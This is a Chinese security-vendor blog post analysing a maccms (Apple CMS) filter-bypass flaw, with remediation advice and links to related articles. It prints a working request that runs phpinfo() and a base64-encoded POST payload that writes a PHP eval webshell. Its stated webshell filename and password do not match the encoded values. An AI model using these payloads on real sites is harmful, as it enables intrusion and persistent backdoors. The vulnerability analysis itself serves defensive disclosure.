正文

网站***修复网站漏洞修复方案

author  author  2022-12-12  336

关键词：

网站***修复网站漏洞修复方案

分类专栏：网站安全网站被黑 centos运维如何防止网站被侵入如何防止网站被黑如何防止网站被挂马网站安全服务怎么查找网站漏洞 web网站安全服务 dedecms老被挂马该内容被禁止访问网站被黑怎么修复 MetInfo漏洞修复 ecshop网站安全修补 wordpress漏洞修复 ecshop漏洞修复 dz论坛Discuz_X3.4最新网站漏洞网站安全
版权
苹果cms系统，是目前很多电影网站都在使用的一套网站系统，开源，免费，扩展性较好，支持一键采集，伪静态化，高并发的同时承载，获得的很多站长的喜欢，于近日被网站安全检测发现，maccms存在网站漏洞，sql注入盲射获取数据库的管理员账号密码，关于该漏洞的详情，我们仔细分析看下.

maccms漏洞分析与修复

苹果CMS采用的是php语言开发的代码，使用的数据库是mysql类型，这种架构是比较常用的，也是比较稳定的，但是在安全方面出现的问题是比较多的，这次发现的是sql注入漏洞，在网站的根目录下的inc文件里的module目录下的vod.php代码如下图所示：
技术图片

代码里的empty($wd函数，在进行判断如果是，或者不是的逻辑过程当中，会将前段用户访问带来的参数，进行安全过滤，我们跟进代码来追寻到苹果CMS的配置文件，在function.php配置文件代码李看到对网站的所有请求方式包括get、post、cookies的提交方式都强制性的进行了安全转义。网站漏洞问题的发生就在这里.

我们仔细又发现，maccms使用了360安全提供的防止sql注入拦截代码。360的防止sql注入是好几年前开发，并公开在网络上的，已经很久没有更新维护了并且还存在sql注入代码绕过的情况，参数值之间进行实体转换的时候，360的sql拦截规则没有对空白符以及反斜杠进行拦截，导致可以绕过插入恶意参数，直接请求到苹果cms后端数据库中去，获取苹果CMS的管理员账号密码。
技术图片

我们来看下如何利用苹果CMS的漏洞，从上面漏洞发生的细节里可以看出，是因为拦截sql注入语句的过程中存在可以被绕过的漏洞。我们来使用%0b，以及空格对代码进行注入，sql语句在拼接中，可以插入反斜杠进行单引号的报错，从而绕过苹果CMS的安全拦截。语句如下：

GET请求：

http://127.0.0.1/index.PHP?m=vod-search&wd=if-A:phpinfo()endif-A

可以直接看php的具体信息

POST请求

可以直接获取webshell

http://127.0.0.1/index.PHP?m=vod-search

POST内容如下：

wd=if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)endif-A
技术图片

可以直接生成带有一句话***后门的代码，文件名为safe.php,一句话***链接密码是safe.

如何修复苹果cms网站漏洞呢？

对网站漏洞的修复我们要知道漏洞产生的原因，以及为何会绕过苹果CMS的安全过滤，maccms使用的addslash安全函数，sql中没有加单引号的安全防护，in字句也很容易忘记加引号，再一个后期处理安全过滤的时候可以插入单引号，stripslash导致可以加入单引号，编解码导致绕过addslash，使用urldecode编码进行注入绕过，根据上面提出的漏洞绕过，我们SINE安全提出漏洞修复的建议是：对URL解码进行双层的转义，对get,post,cookies的拦截规则进行安全更新，加强空格，以及百分符号的拦截,如果对程序代码不熟悉的话建议咨询专业的网站安全公司来处理解决。

网站漏洞检测修复短息轰炸漏洞检测与修补方案

网站漏洞检测修复短息轰炸漏洞检测与修补方案分类专栏：网站安全网站被篡改网站被黑如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务web网站安全服务怎么查找网站漏洞网站***检测网站被黑怎么修复wor... 查看详情

网站漏洞修复之vim文本编辑bug分析与修复方案

网站漏洞修复之vim文本编辑BUG分析与修复方案分类专栏：网站安全网站被黑如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务网站安全防护服务网站安全维护网站安全问题怎么查找网站漏洞网站后门检测工... 查看详情

struts2架构网站漏洞修复详情与利用漏洞修复方案

...互联网企业，公司，平台都在使用apachestruts2系统来开发网站，以及应用系统，这几年来因为使用较多，被***者挖掘出来的struts2漏洞也越来越，从最一开始S2-001到现在的最新的s2-057漏洞，本文着重的给大家介绍一下struts2漏洞的利... 查看详情

怎么修复网站漏洞骑士cms的漏洞修复方案

骑士CMS是国内公司开发的一套开源人才网站系统，使用PHP语言开发以及mysql数据库的架构，2019年1月份被某安全组织检测出漏洞，目前最新版本4.2存在高危网站漏洞，通杀SQL注入漏洞，利用该网站漏洞可以获取网站的管理员账号... 查看详情

分享网站漏洞检测与如何修复网站逻辑漏洞

分享网站漏洞检测与如何修复网站逻辑漏洞分类专栏：网站安全网站被篡改网站被黑如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务网站安全防护服务网站安全维护网站安全问题ecshop漏洞修复MetInfo漏洞... 查看详情

网站漏洞安全***测试公司组建方案

网站漏洞安全***测试公司组建方案分类专栏：网站安全漏洞检测网站漏洞修复网站***测试文章标签：***测试公司网站安全公司网站漏洞修复公司网站程序漏洞查找网站安全维护公司版权越来越多的网站和app的上线,导致安全问题... 查看详情

xss网站漏洞如何修复大牛支招让您网站更安全

XSS网站漏洞如何修复大牛支招让您网站更安全分类专栏：网站被黑网站安全如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务网站安全防护服务网站安全维护网站安全问题怎么查找网站漏洞ecshop漏洞修复Met... 查看详情

网站安全之逻辑漏洞检测附网站漏洞修复方案

在网站安全的日常安全检测当中，我们SINE安全公司发现网站的逻辑漏洞占比也是很高的，前段时间某酒店网站被爆出存在高危的逻辑漏洞，该漏洞导致酒店的几亿客户的信息遭泄露，包括手机号，姓名，地址都被泄露，后续带... 查看详情

针对网站漏洞怎么修复区块链漏洞之以太坊

针对网站漏洞怎么修复区块链漏洞之以太坊分类专栏：网站安全网站安全文章标签：网站漏洞怎么修复网站安全公司网站漏洞修复网站安全网站漏洞检测版权前段时间以太坊升级架构，君士坦丁堡的硬分叉一个升级代号，被爆出... 查看详情

网站安全之逻辑漏洞检测附漏洞修复方案

网站程序代码存在漏洞如何挖掘和修复

网站程序代码存在漏洞如何挖掘和修复分类专栏：***测试公司网站安全漏洞检测网站漏洞修复文章标签：漏洞修复网站代码审计网站安全测试版权国内学习漏洞挖掘的习惯所谓奠定基础，学习各种编程书籍，然后学习漏洞挖掘，... 查看详情

***测试对头像上传漏洞检测与修复

***测试对头像上传漏洞检测与修复分类专栏：网站安全漏洞检测网站***测试网站被黑文章标签：***测试网站安全测试网站漏洞检测网站安全防护网站漏洞扫描版权很多客户网站以及APP在上线运营之前都会对网站进行***测试，提前... 查看详情

企业网站被黑dedecms漏洞修复办法

企业网站被黑dedecms漏洞修复办法分类专栏：网站安全网站被黑网站被篡改如何防止网站被黑如何防止网站被挂马网站安全服务如何防止网站被侵入怎么查找网站漏洞dedecms老被挂马网站安全版权前段时间网站被黑了，从百度打开... 查看详情

网站被篡改怎么解决并查找网站漏洞

网站被***篡改***怎么解决并查找网站漏洞分类专栏：网站安全网站被篡改如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务网站安全防护服务网站安全维护怎么查找网站漏洞网站安全检测ecshop网站安全修补... 查看详情

如何防止网站被防止网站数据被篡改

如何防止网站被***防止网站数据被***篡改分类专栏：服务器安全网站被黑网站安全网站被篡改如何防止网站被黑网站安全服务如何防止网站被挂马如何防止网站被侵入网站安全维护网站安全防护服务网站安全问题web网站安全服务... 查看详情

discuz被挂马快照被劫持跳转该如何处理如何修复discuz漏洞

...快照被劫持跳转该如何处理如何修复discuz漏洞分类专栏：网站安全网站被黑如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务网站安全防护服务网站安全维护dz论坛Discuz_X3.4最新网站漏洞网站安全检测百度... 查看详情

网站漏洞修复被提示该网站内容被禁止访问

...采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统，对浏览器的兼容以及手机端也是比较不错的，用户使用以及编辑上传方面得到了很多用户的喜欢。前端时间我们SINE安全对其进行全面的网站... 查看详情

drupal网站漏洞修复以及网站安全防护加固方法

drupal是目前网站系统使用较多一个开源PHP管理系统，架构使用的是php环境+mysql数据库的环境配置，drupal的代码开发较为严谨，安全性较高，但是再安全的网站系统，也会出现网站漏洞，drupal是网站运行访问必不可少的一个分支，... 查看详情